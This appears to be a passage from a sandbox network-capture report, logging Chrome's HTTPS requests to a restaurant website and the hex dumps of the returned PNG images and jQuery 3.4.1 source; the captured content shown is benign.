                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 23636
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 64 08 06 00 00 00 0f 33 87 a5 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 38 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR^d3pHYs8%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC7604INData Raw: 1c a9 aa 4a 9a a6 91 db e5 a2 c1 c1 c1 45 f0 14 8d 46 ef 0b 47 22 4f 28 aa ea 57 15 05 b2 a2 40 94 e4 29 de cf af e1 bc dc fd c1 40 80 dc 6e f7 2a 78 bb dd 4e a6 b9 39 f2 f1 fc 67 7d 3e df 5a 41 88 4e dc 6c f8 19 63 d5 00 fe 0e c0 83 4b c1 ab aa 4a 5e 2f 47 63 86 31 f2 78 3c b1 52 83 cf ef 27 3e c0 ef 95 24 51 57 d4 79 3f 2e cb 8a c1 e7 f3 fe bf 00 cf af 82 5f 0a 3e 18 0e d3 ec ec 2c cd cc cc 7c 8b 0f f0 6f aa aa aa df cc 1f 40 82 a2 28 0f 79 3c 9e 18 78 8f c7 4d 26 f3 1c f9 79 9e 74 5d 27 51 94 28 10 0c d2 94 71 ea 53 76 a7 23 43 67 cc 15 8b f3 15 65 2e 14 0c fe ab cb e5 22 c3 d8 d8 fb 06 de eb e3 68 92 9b 20 17 ef f8 68 82 37 99 4c 64 b5 59 69 68 68 f0 4b 43 43 43 87 42 a1 90 eb 96 a4 4b 55 4f fa 7c be ef 29 8a f2 c0 22 78 ab cd 4a c6 85 d5 02 aa aa 52
                                                                                                                                                    Data Ascii: JEFG"O(W@)@n*xN9g}>ZANlcKJ^/Gc1x<R'>$QWy?._>,|o@(y<xM&yt]'Q(qSv#Cge."h h7LdYihhKCCCBKUO|)"xJR


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    26192.168.2.449767162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC386OUTGET /assets/imgs/cook_breakfast.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:04:58 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 82284
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC5499INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 8d c0 e3 0f 3e c1 e8 d8 51 ce 6a 48 0e 1c e8 73 c1 52 cd ec 85 09 fb 8e 1e 24 cf 97 d1 a6 20 54 e0 ca 04 6d 04 91 91 f8 00 3e 58 08 35 c1 d5 1c 3d 59 b3 eb 92 0e 7b 2e de c5 8d f7 3e 41 3a fb 20 d3 d3 86 ba da cd f2 da 21 d6 8e de c7 91 87 6b 36 6d bf 94 cb 2f be 9a c7 86 37 b2 de 87 7b 4e 1e a3 9e 4b e8 74 1a 2c ad 1e a3 3f 80 db bf b8 c6 b5 2f 3b ce c6 73 87 b4 9a 35 de 76 a6 7b c3 e1 83 55 59 bd b0 ac c3 a7 fe 4d 03 5a 08 16 82 e7 53 26 92 17 07 5f 51 96 23 d2 f6 66 9c 6e 52 f7 8f 21 9c c0 36 26 51 cd 26 22 6a 52 0b 89 f7 16 5f d7 78 21 30 71 82 56 1a 25 25 52 ab 33 0a f2 31 80 9d f0 28 25 49 90 78 39 1e 2f 0b 13 23 22 87 af 03 ce 09 74 30 c4 22 c2 c4 1d 82 6a e0 b4 46 88 80 a8 46 84 6c 9d 32 8c bb 21 2a 18 04 0a 54 20 b8 0a 5c 8d af 72 6a db c7 17 19
                                                                                                                                                    Data Ascii: >QjHsR$ Tm>X5=Y{.>A: !k6m/7{NKt,?/;s5v{UYMZS&_Q#fnR!6&Q&"jR_x!0qV%%R31(%Ix9/#"t0"jFFl2!*T \rj
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 49 8c 4a 12 48 1b f4 86 19 6e 94 93 a6 31 41 43 5d 15 cc 37 da 4c b7 5b c4 c1 e1 83 66 c5 c2 fd 8f 3f 4a bd 36 a4 65 2b 64 b1 42 e8 2f 11 f7 d7 49 82 c4 2b 50 a2 22 cd fa 4c b9 92 2d 6d c9 ac c8 d0 fd 65 4c 36 62 62 7e 9e 85 3d e7 70 ee f9 7b d9 34 d3 62 3e 4d 98 9b e9 30 9d 26 3c e9 ba 17 91 6f 3d 8f e1 81 7d ac 1e bc 87 e3 8f ed 63 50 96 84 ac 24 35 50 cb 80 69 ce 51 48 b0 b2 62 7d 30 24 af 24 95 95 ac f4 33 b4 6e a3 34 04 99 d3 6c cf a0 27 3a 58 3c 75 51 72 a4 3f c2 4c 6c a1 31 bd 8d 5e c8 39 55 9c 60 71 b0 4c 9d 79 b2 be 13 ab a3 fc d8 b1 d3 cb 5f 5d 5e 1f b2 b4 36 60 69 6d c0 a5 af 79 d7 d7 06 f4 4d 1f fd 9d 31 99 7e bc 8a f4 19 55 95 fd 50 b0 39 2a 54 48 e9 40 18 e2 b8 85 49 1a b8 10 10 ae 42 f9 62 ec 33 27 15 c1 7b 5c f0 c4 69 84 16 01 ef 73 3c 20
                                                                                                                                                    Data Ascii: IJHn1AC]7L[f?J6e+dB/I+P"L-meL6bb~=p{4b>M0&<o=}cP$5PiQHb}0$$3n4l':X<uQr?Ll1^9U`qLy_]^6`imyM1~UP9*TH@IBb3'{\is<
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: c3 eb df 98 dd b8 7a 6d f6 aa 01 ed db 7a 47 54 0b a0 bc ef 87 f8 61 88 11 92 22 1f e2 db 1a 2b 24 88 9c 7e 23 a2 dc de c4 c6 5d 64 a7 45 ad 62 82 a6 64 be 79 85 a2 2a 69 f5 3b b8 72 d1 a4 9f 57 96 74 52 11 b7 bb a8 d8 27 af 73 12 6a aa 22 25 df dd 5d 8c c7 43 97 3a 74 91 7e 8b 12 81 a0 46 98 19 9e 1d 61 6d 13 61 c0 d3 25 c6 b8 a8 76 87 79 3c a0 36 3e c2 96 38 49 cc 6c 3a 46 a1 f1 9b 4d 6a 63 10 f9 98 40 45 68 67 41 c9 2a 75 8d 20 47 0a 8b 4e 4b 74 1c f3 03 ff e0 9f b2 7b 63 93 b2 a3 a8 8a 11 e4 33 b4 98 42 90 a3 dc 16 a5 17 e3 37 9a e8 6c 8e 28 a7 24 8e 25 c5 a3 19 2d 2f 7a e6 66 c8 3b cf 78 7c e0 57 ce 73 a9 ed 73 ea ce 37 33 ae 60 2c 7c bc c9 21 9d e1 55 ba ed 36 e5 f2 19 6a af 45 b1 f9 2c bd a2 a4 9a 0b 72 67 8d b0 dd 24 76 6b d2 59 45 5a 79 68 21 99
                                                                                                                                                    Data Ascii: zmzGTa"+$~#]dEbdy*i;rWtR'sj"%]C:t~Fama%vy<6>8Il:FMjc@EhgA*u GNKt{c3B7l($%-/zf;x|Wss73`,|!U6jE,rg$vkYEZyh!
                                                                                                                                                    2024-10-01 04:26:30 UTC11601INData Raw: ed 5b ce 68 10 b1 e8 59 f6 cd 6b 72 e5 75 0c 8e 8e f1 3b 7f f0 36 4c ac 59 56 ae f0 8d 2b 3e c3 37 3e f5 29 7e e7 7d 6f e7 ec 67 ff 2f 26 0e 4f 52 5a 31 c4 d1 da 04 ed 66 cc de f9 05 46 37 17 59 37 22 18 8e 61 76 36 c5 cb 14 e9 0c 07 3b ee 7b f8 d1 bf 3c 74 f8 3d 4b 65 d3 0f 7e de f6 ba 3f 7b 12 d3 20 93 fe d0 29 de 5a fb 99 30 b6 2f 4f 11 2f f4 1c 7a ea f0 7e 81 c2 e8 2a a4 d6 2c 4c 8e d3 ea 74 98 9d eb b0 50 8d 09 fc 26 5a a5 58 7c 72 81 47 d0 5c a0 f5 c8 4e aa 07 f6 51 1e 56 e4 cb a7 52 2c 8f e0 65 5c 82 4c 80 af 1d 0a 6e 96 b9 85 84 ce c4 38 e3 49 4c b9 af 4c ce 2f d2 6c 2f a2 d3 3a d9 a0 8c 89 5a 74 13 d0 85 3e 9c c0 21 24 25 8d bb e8 b8 8d d2 59 ac 70 10 42 61 a2 06 bd 45 71 89 ca 67 71 7c 41 ab 15 11 db 18 37 93 a5 e0 f5 d3 89 52 e6 67 e7 c8 54 86
                                                                                                                                                    Data Ascii: [hYkru;6LYV+>7>)~}og/&ORZ1fF7Y7"av6;{<t=Ke~?{ )Z0/O/z~*,LtP&ZX|rG\NQVR,e\Ln8ILL/l/:Zt>!$%YpBaEqgq|A7RgT


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    27192.168.2.449772162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC393OUTGET /assets/vendors/jquery/jquery-3.4.1.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC280INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 280364
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16104INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 35 2d 30 31 54 32 31
                                                                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.4.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2019-05-01T21
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 22 2c 20 22 69 22 20 29 0a 09 7d 2c 0a 0a 09 72 68 74 6d 6c 20 3d 20 2f 48 54 4d 4c 24 2f 69 2c 0a 09 72 69 6e 70 75 74 73 20 3d 20 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 0a 09 72 68 65 61 64 65 72 20 3d 20 2f 5e 68 5c 64 24 2f 69 2c 0a 0a 09 72 6e 61 74 69 76 65 20 3d 20 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 0a 0a 09 2f 2f 20 45 61 73 69 6c 79 2d 70 61 72 73 65 61 62 6c 65 2f 72 65 74 72 69 65 76 61 62 6c 65 20 49 44 20 6f 72 20 54 41 47 20 6f 72 20 43 4c 41 53 53 20 73 65 6c 65 63 74 6f 72 73 0a 09 72 71 75 69 63 6b 45 78 70 72 20 3d 20 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 0a
                                                                                                                                                    Data Ascii: ", "i" )},rhtml = /HTML$/i,rinputs = /^(?:input|select|textarea|button)$/i,rheader = /^h\d$/i,rnative = /^[^{]+\{\s*\[native \w/,// Easily-parseable/retrievable ID or TAG or CLASS selectorsrquickExpr = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 65 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 20 63 6f 6e 74 65 78 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 20 74 61 67 20 29 3b 0a 0a 09 09 09 2f 2f 20 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 20 6e 6f 64 65 73 20 64 6f 6e 27 74 20 68 61 76 65 20 67 45 42 54 4e 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 73 75 70 70 6f 72 74 2e 71 73 61 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 20 63 6f 6e 74 65 78 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 74 61 67 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 20 3a 0a 0a 09 09 66 75 6e 63 74 69 6f 6e 28 20 74 61 67 2c 20 63 6f 6e 74 65 78 74 20 29 20 7b 0a 09 09 09 76 61 72 20 65 6c 65 6d 2c 0a 09 09 09 09 74 6d 70 20 3d
                                                                                                                                                    Data Ascii: e !== "undefined" ) {return context.getElementsByTagName( tag );// DocumentFragment nodes don't have gEBTN} else if ( support.qsa ) {return context.querySelectorAll( tag );}} :function( tag, context ) {var elem,tmp =
                                                                                                                                                    2024-10-01 04:26:30 UTC15260INData Raw: 43 61 63 68 65 2c 20 6e 6f 64 65 2c 20 6e 6f 64 65 49 6e 64 65 78 2c 20 73 74 61 72 74 2c 0a 09 09 09 09 09 09 64 69 72 20 3d 20 73 69 6d 70 6c 65 20 21 3d 3d 20 66 6f 72 77 61 72 64 20 3f 20 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 20 3a 20 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 0a 09 09 09 09 09 09 70 61 72 65 6e 74 20 3d 20 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 0a 09 09 09 09 09 09 6e 61 6d 65 20 3d 20 6f 66 54 79 70 65 20 26 26 20 65 6c 65 6d 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 0a 09 09 09 09 09 09 75 73 65 43 61 63 68 65 20 3d 20 21 78 6d 6c 20 26 26 20 21 6f 66 54 79 70 65 2c 0a 09 09 09 09 09 09 64 69 66 66 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 09 09 09 09 69 66 20 28 20 70 61 72 65 6e 74 20
                                                                                                                                                    Data Ascii: Cache, node, nodeIndex, start,dir = simple !== forward ? "nextSibling" : "previousSibling",parent = elem.parentNode,name = ofType && elem.nodeName.toLowerCase(),useCache = !xml && !ofType,diff = false;if ( parent
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 74 65 78 74 2c 20 78 6d 6c 20 29 20 29 20 7b 0a 09 09 09 09 6e 65 77 55 6e 6d 61 74 63 68 65 64 2e 70 75 73 68 28 20 65 6c 65 6d 20 29 3b 0a 09 09 09 09 69 66 20 28 20 6d 61 70 70 65 64 20 29 20 7b 0a 09 09 09 09 09 6d 61 70 2e 70 75 73 68 28 20 69 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 72 65 74 75 72 6e 20 6e 65 77 55 6e 6d 61 74 63 68 65 64 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 65 74 4d 61 74 63 68 65 72 28 20 70 72 65 46 69 6c 74 65 72 2c 20 73 65 6c 65 63 74 6f 72 2c 20 6d 61 74 63 68 65 72 2c 20 70 6f 73 74 46 69 6c 74 65 72 2c 20 70 6f 73 74 46 69 6e 64 65 72 2c 20 70 6f 73 74 53 65 6c 65 63 74 6f 72 20 29 20 7b 0a 09 69 66 20 28 20 70 6f 73 74 46 69 6c 74 65 72 20 26 26 20 21 70 6f 73 74 46 69 6c 74 65 72 5b
                                                                                                                                                    Data Ascii: text, xml ) ) {newUnmatched.push( elem );if ( mapped ) {map.push( i );}}}}return newUnmatched;}function setMatcher( preFilter, selector, matcher, postFilter, postFinder, postSelector ) {if ( postFilter && !postFilter[
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 6c 2f 72 65 6c 61 74 69 76 65 20 73 65 6c 65 63 74 6f 72 2c 20 63 68 65 63 6b 20 6d 65 6d 62 65 72 73 68 69 70 20 69 6e 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 73 65 74 0a 09 09 09 2f 2f 20 73 6f 20 24 28 22 70 3a 66 69 72 73 74 22 29 2e 69 73 28 22 70 3a 6c 61 73 74 22 29 20 77 6f 6e 27 74 20 72 65 74 75 72 6e 20 74 72 75 65 20 66 6f 72 20 61 20 64 6f 63 20 77 69 74 68 20 74 77 6f 20 22 70 22 2e 0a 09 09 09 74 79 70 65 6f 66 20 73 65 6c 65 63 74 6f 72 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 20 26 26 20 72 6e 65 65 64 73 43 6f 6e 74 65 78 74 2e 74 65 73 74 28 20 73 65 6c 65 63 74 6f 72 20 29 20 3f 0a 09 09 09 09 6a 51 75 65 72 79 28 20 73 65 6c 65 63 74 6f 72 20 29 20 3a 0a 09 09 09 09 73 65 6c 65 63 74 6f 72 20 7c 7c 20 5b 5d 2c 0a 09 09 09 66 61 6c 73
                                                                                                                                                    Data Ascii: l/relative selector, check membership in the returned set// so $("p:first").is("p:last") won't return true for a doc with two "p".typeof selector === "string" && rneedsContext.test( selector ) ?jQuery( selector ) :selector || [],fals
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 09 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 6d 69 73 65 73 61 70 6c 75 73 2e 63 6f 6d 2f 23 70 6f 69 6e 74 2d 35 39 0a 09 09 09 09 09 09 09 09 09 2f 2f 20 49 67 6e 6f 72 65 20 64 6f 75 62 6c 65 2d 72 65 73 6f 6c 75 74 69 6f 6e 20 61 74 74 65 6d 70 74 73 0a 09 09 09 09 09 09 09 09 09 69 66 20 28 20 64 65 70 74 68 20 3c 20 6d 61 78 44 65 70 74 68 20 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 65 64 20 3d 20 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 20 74 68 61 74 2c 20 61 72 67 73 20 29 3b 0a 0a 09 09 09 09 09 09 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 50 72 6f 6d 69 73 65 73 2f 41 2b 20 73 65 63 74 69 6f 6e 20 32 2e 33 2e 31 0a 09 09 09 09 09 09
                                                                                                                                                    Data Ascii: // https://promisesaplus.com/#point-59// Ignore double-resolution attemptsif ( depth < maxDepth ) {return;}returned = handler.apply( that, args );// Support: Promises/A+ section 2.3.1
                                                                                                                                                    2024-10-01 04:26:30 UTC16336INData Raw: 20 3d 20 2f 5b 41 2d 5a 5d 2f 67 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 44 61 74 61 28 20 64 61 74 61 20 29 20 7b 0a 09 69 66 20 28 20 64 61 74 61 20 3d 3d 3d 20 22 74 72 75 65 22 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 09 7d 0a 0a 09 69 66 20 28 20 64 61 74 61 20 3d 3d 3d 20 22 66 61 6c 73 65 22 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 7d 0a 0a 09 69 66 20 28 20 64 61 74 61 20 3d 3d 3d 20 22 6e 75 6c 6c 22 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 0a 09 7d 0a 0a 09 2f 2f 20 4f 6e 6c 79 20 63 6f 6e 76 65 72 74 20 74 6f 20 61 20 6e 75 6d 62 65 72 20 69 66 20 69 74 20 64 6f 65 73 6e 27 74 20 63 68 61 6e 67 65 20 74 68 65 20 73 74 72 69 6e 67 0a 09 69 66 20 28 20 64 61 74 61 20 3d 3d 3d 20 2b
                                                                                                                                                    Data Ascii: = /[A-Z]/g;function getData( data ) {if ( data === "true" ) {return true;}if ( data === "false" ) {return false;}if ( data === "null" ) {return null;}// Only convert to a number if it doesn't change the stringif ( data === +
                                                                                                                                                    2024-10-01 04:26:30 UTC48INData Raw: 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 20 22 64 69 76 22 20 29
                                                                                                                                                    Data Ascii: ent.appendChild( document.createElement( "div" )
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 20 29 2c 0a 09 09 69 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 20 22 69 6e 70 75 74 22 20 29 3b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 34 2e 30 20 2d 20 34 2e 33 20 6f 6e 6c 79 0a 09 2f 2f 20 43 68 65 63 6b 20 73 74 61 74 65 20 6c 6f 73 74 20 69 66 20 74 68 65 20 6e 61 6d 65 20 69 73 20 73 65 74 20 28 23 31 31 32 31 37 29 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 57 69 6e 64 6f 77 73 20 57 65 62 20 41 70 70 73 20 28 57 57 41 29 0a 09 2f 2f 20 60 6e 61 6d 65 60 20 61 6e 64 20 60 74 79 70 65 60 20 6d 75 73 74 20 75 73 65 20 2e 73 65 74 41 74 74 72 69 62 75 74 65 20 66 6f 72 20 57 57 41 20 28 23 31 34 39 30 31 29 0a 09 69 6e 70 75 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 22
                                                                                                                                                    Data Ascii: ),input = document.createElement( "input" );// Support: Android 4.0 - 4.3 only// Check state lost if the name is set (#11217)// Support: Windows Web Apps (WWA)// `name` and `type` must use .setAttribute for WWA (#14901)input.setAttribute( "


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    28192.168.2.449777162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
